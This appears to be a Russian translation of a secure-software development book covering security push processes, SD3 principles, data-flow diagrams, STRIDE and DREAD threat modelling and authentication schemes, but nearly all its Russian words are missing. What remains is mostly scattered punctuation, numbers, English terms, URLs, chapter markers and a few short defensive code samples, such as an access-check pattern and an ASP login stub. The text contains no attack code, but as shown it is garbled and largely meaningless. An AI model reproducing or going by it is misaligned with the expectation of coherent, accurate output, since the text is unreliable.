. ,
90. , 850
(Steve McConnell) (Microsoft Press, 1993)
. 
, , 

.
.
.
, , ,
AutoPC , 
. , , 
,
. , ,
( ) 
, , 
. , ,

. , World Wide Web 
Wild Wild Web* ? , . 
, , .


, 13 2001 , Web
, 
(System Administration, Networking and Security Institute, SANS) http://
www.sans.org. SANS
SANS NewsBytes 
:
, 
. 

,
, , . 
.
, . 
(defacement) Web
http://www.msnbc. com/news/600122.asp.

! , 
, .
, ,
. : 
, , , 
.
, 
. ,

, Web, Wild Wild West (, ). . .

, , , 
. 
, ,
. 
, , 
, .
, , ,
, .
, .

Web-
, ,
. , 
, . (honey
pot* ), .
, 
,
Honeynet (project.honeynet.org).
, 90
Web http://www.windows2000test.com,
Windows 2000 . 
. Web , 
. , 
.
, , . ,
, .

. ,

. , ,
(whitehats), ,
; .

, Microsoft.
, . 
: 
. 
, , ,
.
, 
(script kiddies).
, (scripts),

. . .

, , 
, ( exploit code,
exploit, sploit).

, Web- Windows 2000


, , , , 
? . Windows 2000 
, . ( , 

.)  (), IP, 
Microsoft, IP
. , ,
. (port
scanning). 80 
(Hypertext transfer protocol, HTTP).
HTTP HEAD, , 
Web. Internet Information Services 5
(IIS 5), . 
Web, IP ,
Web, Windows 2000, 
www.windows2000test.com.
http://www.slashdot.org,
.
, , , 
! .
 . ,
, exploit ,
.
, 
, . 
. :
. ,
. ! ,
,
, .
, 
.
, , , 
, , , 
, , . 
, , 
!
, , 
.
, . , , , 

. 
, 
,  
.
,
. , 

, .
, .


, , (trustworthy computing),
,
Microsoft , , . , , 
: , .
, 
.
, . ,
, . 

. , 
. (
.) ,
. 
, , , 
, .
, ,  
. , 
, (selfhealing). 
.
, 
.

!
, ,
, , 
. 
, . 
,
. , ,
. ? ,
. , 
.
, (
) . ,

,
. , ?


, 
, . , 
.
, , ,
.


. , 
.
!
, .
, , ,
. ( ,
, 
; .) , 

. , ,
, 
.

, , 
: .
. , 
, ,
. , , ,
. , ,
,  .
. 11, .


, 
. , 
Microsoft Age of Empires 2, ,
, 
. , ,
. 
, , 
.

. 11.

( )
, , 
. , ,
.
, ? 
, ,
, 

, . , 
, 
. 
.

, ,
, 
, .
,
.
.
, ,
. ,
, .


, , 
, . , 
, , 
. , 
!


,
.
 ,
:
;
, ;
, ;
, ;
;
;
,
, Authenticode;
Web;
, 
;
PR,
;
 (ISP);
,
, ,
;
. 
,
.  , 
, , ,
;
, ,  , 
.
,
, . 
!

, 
Microsoft (Microsoft Security Response Center) ,
, ,
100 000 .
, 

(Computer Crime and
Intellectual Property Section, CCIPS) Web (http://
www.cybercrime.gov).

10

, , ,
. 
, , 
.

.


,
. .
, 
. .
, 
. , , ,
, .
, :
;
;
(script) , 
;
(
, ?);
, 
;
,
,
.
(regression bug)? 
; , . 
, . 
, ,
, . ,

.
. ,
.
Perl, .
: ,
, . , 
, . .
TCP (Transmission Control
Protocol), Perl: 
, , 
. ,
, .

11

5.

, 
,
. :
 (own), 
?
(own)? 

. , 0wn3d (owned
). , !
. , 3
e (, 
E), 0 O . , 
, (rooted) 
(root). 
(superuser), Unix root.
Administrator () SYSTEM Microsoft Win
dows NT/2000/XP .
, . 
; , , .
,  ,

, , , , 
. ,
.
! , 
. .
, 
, .



, , 

, . , , 
,
.
, 
, , 

12


. , 

.



,

. 
, ,
. , ,
(Jim Allchin),  Windows Microsoft.
, Windows:
, , Windows XP 
. ,
, 

. , Microsoft

.

, 
.
Windows XP 
.
, .

, , 
,
.
,
,
. , Windows
XP ,
.

.
: .
, . , 
, . 
, Windows XP 

13

, . : 
,
.
Microsoft 2002 ,

(Trustworthy Computing),

. 
, 
. Web
news.com.com/20091001817210.html.



, , ,
.
, . 
:
;

;
, ;

. : 
, ,
;

, .
, .



: NTBugTraq BugTraq. Windows NT,
. NTBugTraq 
(Russ Cooper), http://
www.ntbugtraq.com. BugTraq, ,
,
SecurityFocus, Symantec Corporation. 
http://www.securityfocus.com, 
20 . 
NTBugTraq BugTraq 
.
SecurityFocus (http://
www.securityfocus.com), VulnDev, PenTest SecProg.

14



. 
: 
, . , ,
,
.
Microsoft , ,
, :
. , ;
. ,
, ,
, , , ,
, ,
;
, 
;
( )
;
, .
;
;
. 
, . , ,
, .


,
, .
. ,
,
.
, , 
.
, , 
. ,
. 
, , 
: , .
, 
.
.
. 
 .

15

, , . (,
, : , , 
.)
, ,
. ,
.
2000 ,
. , 
, .
, ,

. , ( 
) .
, .
, .


,
. ,
, , , 
, ,
: , 
. : 
. : ,

. , Windows (Secure Win
dows Initiative) Microsoft :
, .
;
(white paper),
. 


;
: , 
, ,
.
.
,
.
;


. Web , 
, , 
, .

16

, 
;

, ,
.


. , 
strcpy 
, , 
.

.


: .
, , 
, ,
. 
. 

.


, ,
.
, , , .
, , , ,
.
, ,
, . , 
24 , 7
. ,
, , 
. , 
.
, 
.
.

17

1:
,

, :
5 * , , . 
, ,
, .
, 
, , .
, .
:
, .
, 
, .

2:
,

, , .
, ,
? ?
.

. , IIS 5 ,
(escape character) URL,

UTF8
. , , 
.
Web http://www.wiretrip.net/rfp/p/doc.asp/i2/
d57.htm.

, .
, , 
, .

3: ,

.
. , 
. , , , 
. 

. . .

18

, , 
, . ,

, .

4:
,

, .
, 
(, , 
, ) . 

.
.

, , .
,
, .
, , 
. , ,  
 , 
. , 
, !
(George Mallory) (18861924), :
? : , .
, 
, , 
.
, , , 
. (
) 
. ,
. ,
.

, , 
. 
, : , 
, .
, , ,
. 
,

. 


, 
, , , 

.
, 
. 
, :
;
,
;
;

20


;

.

. 
, , ,
; ,
, , . 
, , ,
, .
,
.
, . ,
, (usability)
, 

. , , 
!
: , 

? , 
? : ,
.
,
. , 
, , 
. ,
, 
( ). ,
, A B, 
, , A 15% B.
,
, , , 
. . , ,
,
,
.  :
. 3 19.
: , 
, . 
, , 
, , , 
.
: 

21


, .
, .


(
) . 

.
. 21 , 

.
, (waterfall approach), 
,
. .

. 21.

, . ,

.

. , 

. .

22


, ; ,
.
2002 ., Microsoft 
Windows (Windows Security Push).
8500 . , ,
! , ,
, Windows ( 
70), , ! 
, 56 . 
, , 
. ( Microsoft 
.) 
, . , 
, !
? .

. , , :
, , .
. ,
, ,
. , , ,
. : 
, .
, , . 2002 .
Windows Security Push
(Network and
Distributed System Security Symposium, NDSS) ,
. 
, .
Secure Windows Initiative, 

. ,
RSA (RivestShamirAdleman), . 
,
P Q..., , ,
RSA, . : , 
RSA ( , ,
, , ),
. , , 
; .
, , , : RSA
, , ,
, , . 
RSA 


23

. ,
, , +
. , , 
, : 
.
, 
, 
.
, , .
, , , ,
. , . 
: ,
,
. , , 
 ,
?
: ,
.
! : =
.
,

, RSA . 
: RSA , 
. ,
;
,
. ,

, RSA .
!
Windows Security Push. ,
, 
. , , Kerberos, DES (Data Encryption
Standard) RSA, , 
, C++! :
, , , 
, . 
8500 .
: , ,
,
. : , , ,
. (
, ) .
( Microsoft).

24

. , 
 !



, 
. ,
: 
, 
, 
. 
, 
, .
.

! , 
. , , , 
, ,
; , 
, . ,
, 
.


,
, ! ? 
, 
 . 
, , .
 , .
,
.
, 
, ,
. .
:
IIS 6
, . , , ,
. , 
, ? ;
,
. ,
, . !

25


, ,
, 
.
. , 
: ,

. , 
.


, . 
, (
Windows, , 
, HTTP, XML .) , 
(. 22).

. 22.

, :
, , 
, 
.

, 
, , 
.

26

! . , 
, 
, 
. 
!

,

, ,
. ! ,
, , .
.
, .
, 
, :
: , 
.
: .
: ?
: 10 000 ,
.
: 
?
?
: ? 10 000 10 000 !

, , ,
,
. ,
. 
,
.

!
2001 . ,
. :
. 
1000 , 
C .
10 , 16. 
, 
, , ,
. , 

27

. , 45, 41 .
, 54 . ,
55 , . . , , 57,
!
, 
, ,
?
!

, .


, ,
, , . 
,
Microsoft. ,
. , 
, , , , 
, 
. .
! 
; 
.


. , 
, ,
10 , ,
, 10
.. 
.
, :
,
. :
. , .



, .
; 
. , 
, 
.
,
. ,

28

, 
.

, . , 
, .

5.
:
, 
.

. 
, GPS. 
:
;
;
;
, ,
;
( ) ? 
? ?
, , ,
. 
. , 
,
. 
,
, . 
.
,
, , 
. 
, 
. , 
, 
, . 
, !



. 
.
, , 
,

29

. , ? 
, , 
. , , 
. Microsoft 
,
. 
(. 23) . 
, 
, ,
.

!
?
-
Fortune 1000

?

.
,

, Web-

?
! - ,
Web-
. ,
-
.

?

,
100 . -
(script kiddies), "" Web-
(DOS-); ;
,
,
.
, .

?
,

. ,
.
,
.

. 23.

30


, 
. : 
,
? , ,
. 
.
?
?
? 
?
: ? , 
? ?
?
?
 
?

?
?

ISO 17799 Information Technology Code of practice for information security mana
gement ( 
) , 
, , 
, 10.1.1 10.1 Security
requirements of systems ( ):


, 
.
ISO 17799 ,
, 
. www.iso.ch.

, , 
ISO 17799, ,
9.6 Application access control (
), 10.2 Security in application systems (
) 10.3 Crypto
graphic controls ( ).

31



, . ,
 . 
, , 
. 
. ,
,
.
www.ietf.org;
RFC, IETF , 
, .
:
. :
Microsoft Clip Art Gallery, 
(www.microsoft.com/technet/security/bulletin/MS00015.asp);
ufsrestore, Solaris,
root
(online.securityfocus.com/advisories/3621);
sort UNIX, Apple OS X,
DOS (www.kb.cert.org/vuls/id/
417216).
? ,
,
.
, .
 , 
.
:  
(The Net), 
(Sneakers) (Hackers)!
 ,
:
0: ;
1: ;
2: ;
3: ;
4: ;
5: .
, 
? ,
, 

32

. , 
. 
, , 3, 
, 1 2. 
, , 3, 
.
: ,
0 , , 
. 
,
, 3. 
, .
: , 
, , 
, ,
.
, , ,
:

, 
;
, ,
;

. ;

, .
!

(
, ), 
. , ,
. 
,
,
, 
, . 
, ,
.
, , ,
, .

01.09.2002

08.09.2002

1:

22.10.2002
30.10.2002

,

1 ,
Secure Windows

18.11.2002


2:

15.12.2002
10.01.2003

, ,
1:

06.11.2002

27.11.2002


2:

02.02.2003

24.02.2003

2 ,
Secure Windows

28.02.2003

07.03.2003

:

(Release)

03.04.2003
25.05.2003

33


3:

01.06.2003

4

01.07.2003

3 ,
Secure Windows

14.08.2003

:

(Release)

30.08.2003
21.09.2003



(Release
Candidate)

30.09.2003
30.10.2003

, 4 ,
Secure Windows
!

, 
. 

. 
, , ,
. ,
. , , 
: 
, .

34

,
.
.


, , 
, , 
, , . 
, ,
. 
, / .

, . 
,
, , 
, .
, 
, , .

, 
, . 
DOS: ,
.

,
4, ,

. , 
, . : 
. .


,
.
, .
, , 
, 
.
. , 
, . ,

. , ,
, .

35


, , 
. ,
, .
. , , 
,  .
, ,
, , 
,
(), , , 
, , , 
.
, ,
(, , 
, ). 
, ,
, 
. , ,
. , ,
, .
Microsoft 
, ,
A1 Orange Book. (

, A1 .
http://www.dynamoo.com/orange.) ,
, ,
, 
,
.
, . 
, , 10 
50 000 ,
, ,

? ,
; , 
.
( ), 
, 
. ,
!
,
. , 

36

, , ,
, , .
. 
, , ,
. ,
. : ,
, , , 3,
 . 
, .
, ,
.
! , , 
, .
: , 
4.


,
, , 
.

, . Microsoft 
.

. 
.
: .
?



:
(checkin) .
, . 
.


,

. , ,
, :
.  ,

37

 , , ,  
, . (Hawthorn
effect) , *. 
, 
, , 
.
. ,
HTML XML
, .
(code diffs),
. , 
Perl, Windows.

. 
windiff.exe** , , .
, 
. : 
.
, , , 
, 
, .



: ,
, . . , 
, ,
, .
, 
, 
.


, , 3.
, ,
. 
.

(George Elton
Mayo, 18801949) ,
.
. ,
, . . .

** 
. . .

38



, ,
. Microsoft, 
, 
,  
. ,
, ,
. 
, , . 
, 
, .


2001 . Microsoft 
security push. :

;
, 
;
;
.
.
security push ( Windows 8 ), 
, .


. , , 
, , 
. , security push
, ,
, 
. ( , , 
security push , 
, , ,
!)
, 
, :
, 
. , ,
, , ,
, , , 
 . , 


39

,
. 4;
.
; ;
,
.
;
,
,
. :
, .
,
( )! , ;
, 
. . !


, , 
, . :
, 5 ,
, 3 , 
.
, 
. , ,
. 
: 
.



, , .
, ,
. 
4 STRIDE, 
, , , , DS.

!
, , 
, . 
, 
? ,
, . 
. , ,
, , , !

40

, .
, 
, , 
, .

. ! , 
.
,
; , 
, .
, ,
. ,
,
19.


, , , ,
. ? 
, ? , 
: , ?

,
, , 
, 
. , , 
; .
X, ,
. , 

, . ,
, ,
.
, , readme,
, . , , 
readme . 
,
readme 
.
! , ,
!

41



, .
. 
, 
, ,
. ,
.
, , , 
.
, , ,
.
, , ,

. : 
Acknowledgment Policy for Microsoft Security (
Microsoft) (www.micro
soft.com/technet/security/bulletin/policy.asp), RFPolicy ( 
) (www.wiretrip.net/rfp/policy.html)  Responsible Vulnerability
Disclosure Process ( ) (Christey)
(Wysopal) (http://www.ietf.org).
, 
, Common Methodology for Information Technology
Security Evaluation ( 
) (www.commoncriteria.org/docs/ALC_FLR/alc_flr.html).
, .


. , . ,
, .
.
? ! ,
, . 
: ?
! ,
.
.

, ,
. , , 
.

42

, ,
. .

.
.
, 
,
, .
! 
, ! 
.

3
,


.
, 
. ,
,
.
, :
, 
. .

SD3: ,

Windows (Secure Windows Initiative),
, : 
,
( : secure by design, by
default and in deployment SD3). , 
.

44


,
. , 
.
, .
, ,
,
, , 
, .
( 
2).
,
. 4, 
, ,
.

. , . 
, .
,  
. : , 
. , , .
. 
, 
.

. (
). ,
, , 
, 
.
. , 
, .
,
. , 
, ,
, , ,
, 
. 
(code rot).
(penetration analysis).
,
. , 

.


45


.
(hackfests),
.
, 
(denial of service attack, DS
)  

.


,
.
.
:
, ,
.
.
, 
, Administrators () Domain
Administrators ( ), .
,
7, .
. 
( 6).


, .
,
,
. 
, .
.
, , 
, 
. ,
(patch) .

. , 
, ! 
 ,
.
, . 
: , 
( 24) !

46


SD 3. :
. , 
, ; ,
, . 
, , ,

,
. , ? :
;
, ;
;
;
;
, ;
;
;
,
;
, ,
;
, 
( , , 
, );
;
.
, , 
, ,
.


, , 
,  
. . 
.
.
(Norman Cousins) (19151990),

.
(George Santayana) (18631952),

47

.
(Archibald McLeish)
(18921982),

,
. .
?
?
?
?
?
, . ,
, 
, ,
.
.
Microsoft , 
, 
Microsoft (Microsoft Security Response Center) www.microsoft.com/security.
,
, .
:
;
;
;
;
;
;
;
, , 
;
, , , 
(code diffs)* .
, ,

.

: ,
. 
.

, . 
. . .

48


, ,
( , ). 
, 
: ? ,
, .

. 100 
.

, ,
, . 
, , 
.
.
, .
, 
.

, ,
. 20 .
. ,
, 
. ,
, 
!

,

,
, 
. ,
.
19
, , :
(TCP UDP);
(named pipes);
(RPC endpoints);
;
, ;
, ;
ISAPI;
Web;

49

;
, 
(Access Control List, ACL).
,
,
. , ,

SYSTEM, !
Microsoft 
, :
.



, , 
.
,
.
, , ,
. , , 
, . 
.
, 80/20: 20% , 
80% .
20% , 80% , 
. ( 
. , , :
DWORD, 28 , 
!). ,  , 
. 
, :
, .

: , 
, , , 
.
. 
.
, 
. 
, 
. 20 , 
, : ,
, .

50

? .
, . 
,  : 
, ,
,
? : 
, ,
? 
: , , !
. , : ! 
, , 
? 
, !
, 
, : .
, ,
, .
! , 
,
. 
. ,
, 
.


: , 
, 
. . ,
, ,
.
? ,
, XVI , 
. , 
: , 
. . 
, . 
, 
, . * .

.

,
, : , .
. .

51

. 
, ?
, ,
:
;
, 
. , . 
,
. , 
. ,

, ;
;
, 
;
,
( ,
);
:
;
;
.
, 
, 
. .
 ,
. : 
. 
, . ,
, 
. , , . 
, , 
? 
 (single point of failure), 
.
! ,

. !


, 
, , . 
, 

52

, , , , , 
,
. .
,

, , .
, 
. 

.
, : 
? .
, . 
, ,
, 
. , 
? ( , , ,
,
.)

:

, 
, runas,
Run as different user
( ) ( Windows 2000) Run with
different credentials ( ) ( Windows
XP). 
. 
. , 
. 
!
,
, .
, ,
. 
, 
. , ,
, , ,
. ,
, .
, .
.
, . ,
, 

53

, , . 
.
,
, ,
.
7 ,

.


, , 
, . ,
.


:
, ,
, 
.
.
2002 . 2.3.1 3.3 OpenSSH, 
Apple Mac OS X, FreeBSD OpenBSD,
.
, UsePrivilegeSeparation 
ssbd_config. Web www.open
ssh.com/txt/preauth.adv.
Microsoft IIS 6, 
Windows .NET Server. IIS 5, Web 
. 
HTTP (w3wp.exe),
(Network Service), 
(Local System). inietinfo.exe, 
, 
HTTP, .
Web Apache. 
httpd root;
httpd, 
nobody.



. , , 
, ,
, , 
. 

54

.  
: 
, 
. ,
, 1
2. , !

. 
, 
.

,
,
.

: SMB TCP/IP
Microsoft.
SMB (Server Message Block) 
Microsoft LAN
Manager, 80. , SMB
, , Win
dows NT 4 Service Pack 3 Windows 98.
: (man
inthemiddle) , 
, . 
,
,
. SMB ,
, , .
SMB
. 
SMB ,

. :

.
: 
SMB.

TCP/IP. IPSec (Internet Protocol Security)
TCP/IP ,
( ). TCP/IP ,
.

55

,


:
. ,
, , 
, .
, . 
, .
.
. 15 :
DNS, , 
 . , , 
.
, 
, , 
Web . 
 , 
. ,
.
! , , , , 

.
.
, !


, . 
, (bugs).
, .
. , ? ,
Web? ?
, , .
: , 
, , .

: , 
. .


, ,  ? 
: . 
, 

56

.

( ). 
, ,
, 
.
,
. ,
, , 
, Windows.
, 
.

DWORD dwRet = IsAccessAllowed(...);


if (dwRet == ERROR_ACCESS_DENIED) {
// .
// .
} else {
// .
// .
}
, ,
IsAccessAllowed? ,
? ,
 ERROR_NOT_ENOUGH_MEMORY.
:

DWORD dwRet = IsAccessAllowed(...);


if (dwRet == NO_ERROR) {
// .
// .
} else {
// .
// .
}
IsAccessAllowed 
.
. , 
, , 
. , , 
( 
). ,
, , 
.
10. 

.
, 

57

, .
, , 
.
(Jerome Saltzer)
(Michael Schroeder) The Protec
tion of Information in Computer Systems ( 
) (web.mit.edu/Saltzer/www/publications/protection).

: 
, , .

,
,

:
!=
Secure Windows Initiative.
,
. ,
,
. SSL (Secure Socket Layer)
TLS (Transport Layer Security), 
. ( , 
, 
).
, 
, , 
.
. ( , 
, ).
, 
.



, , ,
.
, ,
.
.
,
. , 
.

58


, 2.0
Lotus 123 1985 . 
80 90; 
.
:
. . 
, , .
,
, (
), ( ).
Web, URL 
(crosssite scripting),  HTML
JavaScript. ,
, .
,

. Microsoft
Office XP. 
.


, 

. , :
. , : , ,
, , , . . , ,
. , 
.

,

.

: , , 
, , .
, 
. , ,
, ! , 
.
!
,
(patched) . :

59

, .
,
(40104 ..)
, ,
. , ProcessData,
. ,
. ProcessData
, , 
.
,   
, . 
, .
, , .

.
, , 
. . , , 
,
( 
).
. 
,
!

! , , 
. .
, ,
. 

(threat model), . 
, 
, , 
.
. 
, .
, , , 

, , .
Windows Security Push 2002 ,
,
, , 
,

, (
9), . ,
Windows Security Push ( Microsoft)
, , ,
.

61



, , ,
 , ,
, .
,
, .
, !
.
. . 
, ,  ,
! 
:
, , !
. ,
,
, 
.
. , 
.
 . ,
,
.
! , 
, , 
!
,
.
, ,
.

. , , 
.
, 
. 
, ,
A, B, , A
. , 
A. , , , 
, ,
.
: 
.

62


19.
,
. 
, . 
:
.
:
1. ;
2. ;
3. , ;
4. ;
5. ;
6. ;
7. .
(. 41)
: .
, , 

.

. 41.



. 
.
. 
, , 
. ,

63

, ,
.
,
, , 
, . ,
. ,
,
. , 
: ,
. ,

, .
, 
, . ( 
,
, !)
, 
, ,

, .
.

, Microsoft,
.
, 

.
! 
. , 
. , 
, !



,
, , .
,
. 
: , 
, , 
. , , 
.

, . ,
Microsoft, 2001 ., , 

64

. 
, , 
, .
2002 ., Microsoft @stake (http://www.atstake.com), 
,
, Microsoft. ,
@stake, 
, .
Microsoft SQL Server 
, , 
. , SQL Server
.  SQL Server ,

(data flow diagrams, DFD). , 
, DFD,
.
DFD, 
. ,
 ,
.


, DFD
. , 
, DFD 
. UML (Unified Modeling Language), 
(activity diagram), 
DFD. UML 
,
, DFD. , .
DFD 
UML. 
.
DFD :
, , , 
. DFD
.
DFD (. 42).

,
. DFD
.
, ,

. :  

65

. 
: . 

0, 1, 2 . . (. 43).

,
, ..

. 42.

DFD

DFD,
Web .

DFD Data Flow Diagram


Microsoft Visio Professional 2002.

. 44 
.
DFD
:
. 
, , ,
;
, . 
, Web ,
;
, . Web
, , , 
;

66

. 43. DFD

DFD
. 
, (, , 
. .) ( );
.
. 44 
. . 45
1 .


3.0

67


;
0.0

1.0

2.0
Web-

4.0

. 44.

DFD

DFD, :

;
;
;

;

(: ,
, );
(
: , , );
(: 
, );

68

2.0

14.0

12.0

6.0





9.0
5.0
11.0

1.0

7.0
Web-

13.0

8.0
Web-

3.0
Web-

. 45.

4.0

DFD 1

(: 
, , ).
 , , 
. ,
, . 8 DFD,
, 
. , 
, 
, DFD!

69

, 
DFD 1.
!
, . 
, ,
.
. 46

(, , ).

Web

Web-
Web-

Web-


Web-
Web-

. 46.

70

. 41.

4-1.

. 
, 
5 
.

: Web Web.

: 
,
. : 
, 

Web

Web, Web
Web

HTML


Web

, 

, 

Web
,
Web, Web

Web

HTTP

Web

Web 
: WWW 
,
.
Web

Web


Web. Web




, 
.
,

4-1.

71

()

.
, 

,


. , ,
, 
.
(threat target). , ,
, . ,

.

: STRIDE
, 
:

, ;
;
 ;

?
.
, STRIDE
.
(Spoofing identity) 

.
(
) . 
, 
HTTP: (Basic authentication) 
(Digest authentication). RFC 2617. ,
HTTP
(Blake), (Fletcher) 

72

, 
.
DNS (DNS spoofing) 
DNS (DNS cache poisoning). :
Apple. 
DNS, Web news.com.com/
21001001942265.html, DNS.
(Tampering with data) 
. : 
( ),
, (
, ).
, ACL [, Every
one: Full Control (: )].
(Repudiation)
( ), , 
. , , ,

, .
(nonrepudiation) 
. ,
.
, 
. ,
.
(Information disclosure) 
, , 
, ,

. , , 
: 
, .
(Denial of service)
,
Web . 
DoS 
. 
(distributed denial of service,
DDoS), Trinoo Stacheldraht. Web
staff.washington.edu/dittrich/misc/ddos/.
DoS ,
, . 
:
(Cheryl) Web, 
(Lynn) , 

73

. Web
, 
, .
(Elevation of privilege) 
, 
. 
, 

. . :
, 
,
. ,
.

, . STRIDE
.
. ,
.
, .

STRIDE DREAD (
) , Microsoft
, (Lohen Kohnelder), (Praerit
Garg), (Jason Garms) .
, . 
,
. , , 
:  
root ,
. 
, , 
. , SMTP, 
,

.
!
, , .
(threat trees)
STRIDE.
,
 OCTAVE (Opera
tionally Critical Threat, Asset, and Vulnerability Evaluation) (http://www.cer
t.org/octave).

74



(fault trees). ,
. 
( ), 
. 
. (Edward Amoroso)
Fundamentals of Computer Security Technology (
) . .

, , ,
,
, ,
.
, .
, ( )

(asset). 
(threat target).
( 
), 
. : 
, . 
. 
? 
!
, . 
, .
. 
, . , 
.
, , . 
, ,
, .
 , 
. 
, .
, ,
. 
.
: ,
,
.


75

. 
, , .
,
.

. DFD .
, Web
(, ) (. 47).



1.0

5.0

. 47. DFD 1,
Web
, ()
,
, 
.
. .
:
, , (sniffer)
, (promiscuous mode),
,
 Web* . ,
, .
. 48 , , 

.

, 
. 
, ,
. . .

76



. ,
( ), 
. ,
, , (promis
cuous mode). , ,

.

1


(I)

Component
1.1
HTTP-

1.2.1


1.2

1.2.2

1.2.3

1.2.2.1

1.2.2.1

1.2.2.2

1.2.3.1

. 48.

,
, . 
[ (I)],
. : 
, 
. (1.0) 
(5.0).

77

!
.
: , HTTP
(1.1),
, (1.2.1) ,
(1.2.2) (1.2.3). 
( HTTP), 
1.2.1 1.2.2. ,
. :
:

( 1.2.2.1 1.2.2.2), 
(1.2.2.3).
(
).
, .
, 
. 

. ,
. 48.

1.0
1.1 HTTP! ()
1.2
1.2.1
1.2.2 ,
1.2.2.1 ()
1.2.2.2
1.2.2.3
1.2.3
1.2.3.1
,

. ,
, . 
, , 
, (. 49).
, 
. .
, .

:
. . 411 , 3.2 , 
3.2.1 3.2.2 .

78

, ()
. .


(I)
(S) (E)

1.1

SSL/TLS

1.2

1.3


1.3.1

,

1.2

. 49.


,
(. 42).

4-2. ,

,
. 
,

, . ,

(1.05.0)
(14.0)

STRIDE.
STRIDE

4-2.

79

()

. 
,

( )

.
, ,
. , 
.
. 
.

. : ,
, ,


( )

,
. ,

. ,
, 
.

! 
, , .



, 
, , . 
,
.
( RiskCO)
( ) ,
. 1 10:

<RiskCO> = < > * < >


, . ,
100 (10)
(10).

DREAD
,
Microsoft, DREAD ( RiskDREAD)
.
(Damage potential)
. (10)

80

. 10.
. 
, .
(Reproducibility)
. ( 10),
, ,
, . 

. .
(Exploitability) ,
. , 
, (10).
100 000 000 ,
1. : , [ , 
 (script kiddies)], 
10 . 
. ,
, 
10 . , 
, .
, (Affected users) 
,  . 
: 100%
10, 10% 1 . ,
. , 
.
: , ,
, , . 
, .
, ,
. 100 .
.
(Discoverability) 
. , ,
, 10 , 
.
DREAD (
5). 
, . 
, :
1: 

8

10

: 100%

81

10

: ,

10

: , 

RiskDREAD: (8 + 10 + 7 + 10 + 10) / 5 = 9

9 10 ,
, ,
.
! , ,

. : , 
, ! !
, ,
, .
, (Christopher W. Klaus) 
Internet Security Systems, , 
. , 
:
: ? 
, ? , 
;
? ,
? ?
;
 ? , ,
, ,
.

.

: , ,
STRIDE DREAD
, . 
, STRIDE 
, , 
, , , 
, , DREAD.
STRIDE . 
:
;
;
,
;
;

82

;
, ?

,


. 
DFD
. , 
, .
:
, . 
.
Windows Security Push , 
, 
. , 
,
. 
, , ,
. ,
, 
. , , . 
, 
, , , .
, , 
.
? , , 30
?
? .
, ?
? ,
?
? , ?
? , ?
, , 
. , , 
5 , , , , 
5 , 
15 , 10
. 
. , ,
.
, 
. , 
.

83

, DFD 
(. 43).

4-3. DFD-
STRIDE

.

( ,
), ( ,
) .

.

(reverse engineering)
.

. 
,
.

,
, .
, 
. 
,
.
, , 
. 
.
,
,
,
.
(. 44 49) ,
. . 48 . 410 414 ( 

84

) ,
. 44 49.

4-4.

(5.0  1.0)

: 9
: 10
: 7
: 10
: 10
: 9

, 
.
, ,
, .
, 
, , 
, . 
, Why your switched network isnt
secure ( )
http://www.sans.org

4-5.

Web-

Web (7.0) Web (8.0)

: 7
: 7
: 7
: 10
: 10
: 8,2

4-6.


.
Web
. (
)

: 6

4-6.

85

()


: 6
: 7
: 9
: 10
: 7,6

DoS, 
Web
, .
,
.
3.3: 
(Cartesian join).

, SQL. ,
, 
,
650 000 , 113 000, 75 100,
5 165 095 000 000 000 
.
3.4:
.
,
(11.0), ,
,
.
, , 
(, DoS),

4-7.

(12.0)

: 10
: 5
: 5
: 10
: 10
: 8

4.3 

(2.0) 
,
(12.0). DFD (. 45),

86

4-8.

(5.0)

: 10
: 2
: 2
: 1
: 10
: 5


Web, .
, , 
Web, 
Local System.
,

Web.
, 
. ,
, 

4-9.

(5.0)

: 10
: 2
: 2
: 8
: 10
: 6,4


: (
) 
[ DNS (flood) ]

87

2

Web-

2.1

2.2

2.1.2

2.2.1

e
-

. 410.

2.3
Web-
,

2.4

Web

2.4.1

2
3

3.1

3.2

3.3
er

3.4


3.2.1

3.2.2

. 411.

88

4.1
,

4.2

4.3


4.2.1

4.2.2

4.3.1

4.3.2



(. 1)

SSL

. 412.

4
5

Web-

5.1
,

. 413.

5.2

5.2.1

Web-

5.2.2
,

Web-

89

6

Web-

6.1

,
Web-()

6.2.1

DNS

6.2

6.2.2

IP-

6.2.3.1

. 414.

6.2.3

6.2.3.2


6.2.4

6.2.4.1

er


,  
? 
( 
, ). . 410. , 
2.3 , , ,

. 
,  ?
, : , 
,
.

(zeroday attack) , ,
,  
, exploit.

90

DREAD
.
! .
, 
, ,
.


,
, .
1.
, DFD. DFD
, 
, , .
2. STRIDE ,
. ; 
.
3. 
.
4. 
DREAD .
5. .
, 
.



:
;
;
;
,  .

1:
,
,
.
, 
.  , 
.
: .

91

2:

, . Microsoft Internet Infor
mation Services (IIS) : 
(basic authentication), 
, 
, , 
SSL/TLS.
1, :
, ,

. (
24.)
, , . , 
,
.
: ,
, 
. , 
, 
.

, ,
! 
. , 
.

3:

,
. . ,
: .
, , 
. ,
: 
, . ,
!

4:
: . 
, 
, , 
. , 
.

92


, , 
. . 
, .
. , ,
. , 
, Kerberos 
. . 410 , 
, STRIDE.

4-10. ( )




MAC

,


, . 410, 
, . 
, , 

93

( 
).
,
. 
, . 
, , 
. ,
, 
, .

, , 
(principal), , 
, , .
, . 
(credentials),
, ,
( ).
Windows .
, 
. Windows 
:
;
;
;
Microsoft Passport;
Windows;
NTLM (NT LAN Manager);
Kerberos v5;
X.509;
IPSec (Internet Protocol Security);
RADIUS.
. , 
(Basic Authentication) , ,
Kerberos. 
. , ,
, . 
, ,
. . 411 ,
.

94

4-11.

Microsoft Passport

NTLM

Kerberos

X.509

IPSec

()

()

RADIUS


, 
HTTP 1.0 (. RFC 2617 http://www.ietf.org/
rfc/rfc/rfc2617.txt). , Web Web
, 
. Base64!
, :
, 
, 
SSL/TLS IPSec.


, , RFC 2617,
: , 
. , , 
HTTP, : LDAP, 
IMAP (Internet Message Access Protocol), POP3 (Post Office
Protocol 3) SMTP (Simple Mail Transfer Protocol).


, 
. , Microsoft ASP.NET
IHttpModule FormsAuthenticationModule.
. 
Web,
. Web Web
( SSL/TLS), 
. , 
, ASP.NET, XML.
ASP,
:

95

<%
Dim strUsername, strPwd As String
strUsername = Request.Form("Username")
strPwd = Request.Form("Pwd")
If IsValidCredentials(strUserName, strPwd) Then
' ! !
' ,
Else
' ! /
Response.Redirect "401.html"
End If
%>
. 
.

Microsoft Passport
ssport , 
Microsoft. (
Microsoft Hotmail Microsoft Instant Messenger) 
( 1800flowers.com, Victorias Secret, Wxpedia.com,
Costco Online, OfiiceMax.com, Office Depot 800.com).
, Passport, Web, 
Passport, . Web
Passport
Passport Software Development Kit (SDK) c http://www.passport.com.
Passport ASP.NET PassportAuthen
ticationModule. Microsoft Windows .NET Server 
